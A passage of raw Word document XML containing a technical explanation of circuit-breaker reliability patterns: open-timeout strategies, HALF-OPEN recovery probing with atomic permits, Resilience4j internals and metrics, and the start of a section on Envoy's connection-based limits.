      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> for most services. Long enough for transient issues (a brief overload, a quick restart) to resolve. Short enough to recover quickly once the downstream is healthy. Some implementations use </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exponential backoff for the open timeout</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — first open: 30s, second consecutive open: 60s, third: 120s, capped at 300s. This handles downstream services that are intermittently failing — the circuit becomes progressively more conservative about retesting.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB58F4A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Dynamic open timeout based on failure severity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0946D411" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Advanced circuit breakers correlate open timeout to the observed failure rate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D423CE8" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="966"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure rate 50–70%: open timeout = 30 seconds (mild failure, recover soon).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71277AFA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="966"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure rate 70–90%: open timeout = 60 seconds (significant failure, give more time).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A5BBD7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="966"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Failure rate 90–100%: open timeout = 120 seconds (complete failure, downstream likely needs manual intervention).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B23D3AF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="005E5B0F">
          <v:rect id="_x0000_i4105" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287CE3B3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4. The HALF-OPEN State — Recovery Detection Mechanics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A381F12" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The N Test Request Mechanism</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360CD599" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>HALF-OPEN is the most nuanced state. The circuit allows exactly N requests through to probe the downstream. All other concurrent requests are rejected (NOT_PERMITTED).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B232E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The concurrency challenge:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3151F6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>At the moment of HALF-OPEN transition, many threads may simultaneously attempt calls. If 100 threads all check "is the circuit HALF-OPEN?" and all attempt to become test requests, 100 requests reach the downstream simultaneously — a thundering herd on an already-stressed service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71221152" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The atomic permit mechanism:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FF7784" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit maintains an atomic counter of remaining test permits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D98DF30" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CB72547" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>On HALF-OPEN entry: permitted_calls_remaining = N (e.g., 5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="291E03C3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="7F832A0D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>When a call arrives in HALF-OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1293C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  attempt atomic compare-and-decrement of permitted_calls_remaining:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC7CE04" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    if remaining &gt; 0: decrement, allow call (this is a test call)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F376CE2" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    if remaining = 0: reject immediately (CallNotPermittedException)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C58F6A3" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The atomic decrement ensures exactly N test calls proceed, regardless of how many concurrent callers attempt access. The atomic operation is lock-free using CAS (Compare-And-Swap) — minimal overhead on modern CPUs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BFAB192" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Tracking test request outcomes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7AE64F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>As test requests complete:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E24E59" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="967"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Success: increment half_open_success_count.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E48A85" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="967"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>Failure: record failure, evaluate transition immediately.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A2D028" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Transition logic after N completions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B185F15" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="968"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If failure_count_in_test &gt;= failure_threshold_in_half_open → OPEN.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61046638" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="968"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:t>If success_count_in_test == N (all tests passed) → CLOSED.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D25807" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Partial success handling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2087A451" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Some implementations transition to CLOSED if a minimum success rate is achieved among test requests, rather than requiring all N to succeed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EB76B81" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA3FC0F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>N = 10 test requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07099286" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Required success rate for CLOSED transition: 80%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1546C9F4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644"/>
    <w:p w14:paraId="57BE585D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If 8/10 test requests succeed → CLOSED</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50CB41" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>If 7/10 test requests succeed → OPEN (retry)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02924825" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This is more lenient — accounts for occasional failures even in a recovered service. The trade-off: risk of premature closure if the service is still partially failing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E66A84" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The first failure in HALF-OPEN:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="629110D6" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Some implementations immediately re-open on the first test failure (without waiting for all N tests):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723FCC23" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14875839" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Test request 1: SUCCESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27503FC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Test request 2: FAILURE → immediately transition to OPEN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAB6A31" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>(don't wait for remaining 8 test requests)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6715BCC7" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>This is more conservative — fails fast on any sign of continued failure. Appropriate for services where a single failure is significant (payment processors, authentication services) rather than services where occasional failures are expected (search, recommendations).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F81C79" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:pict w14:anchorId="3ED80838">
          <v:rect id="_x0000_i4106" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1469234E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5. Advanced Circuit Breaker Implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207C168B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resilience4j — The Modern Standard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5379969B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>Resilience4j is the de facto standard circuit breaker library in JVM ecosystems. Its internal architecture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A93966A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Thread-safe sliding window implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AFE661C" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Resilience4j uses a </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>circular array of LongAdder objects</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — JDK's high-performance concurrent counters designed for high-write/low-read scenarios. Each slot holds:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9FEE8D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8F81C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Slot: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627247A5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  totalCalls: LongAdder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55336021" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  failedCalls: LongAdder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBAE00" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  slowCalls: LongAdder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084F11F1" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">  totalDuration: LongAdder   (for average duration calculation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6FF928" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB64C9F" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>LongAdder is superior to AtomicLong for high-concurrency scenarios because it maintains per-CPU-stripe counters, reducing contention. Incrementing is wait-free on most CPUs. Reading (summing all stripes) is slower but infrequent — only when evaluating the threshold after each call.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A6487A" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The state machine as an AtomicReference:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00374C90" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>The circuit state (CLOSED, OPEN, HALF_OPEN) is an AtomicReference&lt;State&gt;. State transitions use CAS to ensure only one thread successfully transitions the state:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6480D46D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D624892" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>boolean transitionToOpen() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E86CB46" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    State current = stateReference.get();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14312C27" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    if (current.equals(CLOSED) || current.equals(HALF_OPEN)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D77810D" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">        return stateReference.compareAndSet(current, OPEN_STATE);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9EA1FF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB9780B" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t xml:space="preserve">    return false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F37FB" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5366EF" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:lastRenderedPageBreak/>
        <w:t>If two threads simultaneously detect threshold breach and both try to transition to OPEN, only one succeeds (CAS returns true for one, false for the other). The losing thread's transition attempt is a no-op — the state is already OPEN. This is lock-free, non-blocking state management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0B4FE" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metrics via Micrometer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704C49C4" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Resilience4j publishes metrics to Micrometer (which bridges to Prometheus, Datadog, CloudWatch, etc.):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B6C7B5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34184CFC" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_state{name="payment-service"} 0  (0=CLOSED, 1=OPEN, 2=HALF_OPEN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="234E3E68" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_failure_rate{name="payment-service"} 23.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BBCF3FA" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_slow_call_rate{name="payment-service"} 5.2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE86947" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_calls_total{name="payment-service", kind="successful"} 8743</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="711BB01E" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_calls_total{name="payment-service", kind="failed"} 2431</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E405B52" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_calls_total{name="payment-service", kind="not_permitted"} 1205</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FC2C56" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>resilience4j_circuitbreaker_calls_total{name="payment-service", kind="slow"} 312</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DA707" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy Proxy — Circuit Breaking at the Infrastructure Layer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063D6B79" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Envoy implements circuit breaking at the </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>sidecar proxy layer</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t> — without any application code changes. This is the service mesh approach: reliability patterns implemented in infrastructure, not application code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D50AFB5" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Envoy's circuit breaker is connection/request based, not error rate based:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B71C025" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>Unlike Resilience4j (which monitors success/failure rates), Envoy's circuit breaker enforces </w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hard limits on concurrent connections and requests</w:t>
      </w:r>
      <w:r w:rsidRPr="006E6644">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E51BFD" w14:textId="77777777" w:rsidR="006E6644" w:rsidRPr="006E6644" w:rsidRDefault="006E6644" w:rsidP="006E6644">
      <w:r w:rsidRPr="006E6644">
        <w:t>YAML</w:t>
      </w:r>
    </w:p>
